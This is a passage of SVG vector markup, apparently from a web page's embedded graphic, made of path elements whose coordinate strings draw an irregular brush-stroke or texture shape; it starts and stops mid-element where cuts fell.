1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n <path 